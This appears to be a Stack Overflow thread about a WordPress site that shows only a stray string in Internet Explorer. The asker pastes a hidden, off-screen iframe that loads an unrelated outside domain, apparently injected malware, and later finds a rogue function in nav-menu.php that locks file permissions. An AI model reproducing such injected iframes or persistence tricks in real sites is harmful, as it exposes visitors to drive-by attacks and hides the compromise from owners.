# Issue with IE and Wordpress Site?

Tags: javascript, php, wordpress, internet-explorer

I am developing a WordPress site from scratch.
Website works fine with every browser other than IE.
When I open the website in IE, it shows me `5 to 10 character` string and nothing else.
When I inspect I found an iframe as below

```
    <SPAN style="POSITION: absolute; WIDTH: 305px; HEIGHT: 309px; TOP: -1189px">lxt <IFRAME height=260 src="http://see.ICANDYHANDLEBARGRIPS.COM/?ie=UTF-16&amp;oq=hoKUreOcFP1CzjEeDf1Y1z4gLAAkUpqGqjEjSn0OaiZPX_BOFZgJ1z6LRVvQ_2w&amp;aqs=msie.126h89.406i1p2&amp;q=wH_QMvXcJwDOFYbGMvrETKNbNknQA0SPxpH2_drRdZqxKGni1-b5UUSk6F-CEh3&amp;es_sm=131&amp;sourceid=msie" width=269></IFRAME>winxyd </SPAN>
```

please help in sorting out this issue.
Thanks

Comment: Please read: [How to create a Minimal, Complete, and Verifiable example](http://stackoverflow.com/help/mcve). In it's current state, we have no idea about any of your setup. Is the iframe coming from a plugin? Is it in your templates? Does it exist in the source in the other browsers as well? Are you suing a theme? Does it happen in the admin or only on the page? There are a lot of unknowns here...

Comment: nope. i frame is generating automatically and neither word of iframe found in WordPress Directory.

Comment: custom development of theme. Iframe does not exists in any browser other then IE.

Comment: I have solved the issue. in wp-includes/nav-menu.php, there is a function named "my_correct()" . This function overwrite the permission of .htaccess and index file to 0444. I commented that code and it work fine with IE.

Answer (score 0):

It seems a javascript error. 
Try enabling script_debug.
You can enable by editing the wp-config.php file & adding,

```
define('SCRIPT_DEBUG', true);
```

before "That's all, stop editing! Happy blogging".

Source : [WP](https://codex.wordpress.org/Using_Your_Browser_to_Diagnose_JavaScript_Errors)

Then the home page will return some errors. Please post those errors here.

Comment: JQMIGRATE: Migrate is installed with logging active, version 1.4.1 jquery-migrate.js?ver=1.4.1:23
    JQMIGRATE: jQuery.fn.load() is deprecated jquery-migrate.js?ver=1.4.1:45
    console.trace() jquery-migrate.js?ver=1.4.1:47
    migrateWarn jquery-migrate.js?ver=1.4.1:47
    jQuery.fn.(anonymous function) jquery-migrate.js?ver=1.4.1:560
    (anonymous function) custom.js?ver=25:9
    JQMIGRATE: jQuery.fn.live() is deprecated jquery-migrate.js?ver=1.4.1:45

Comment: This is what i return in console after script debug.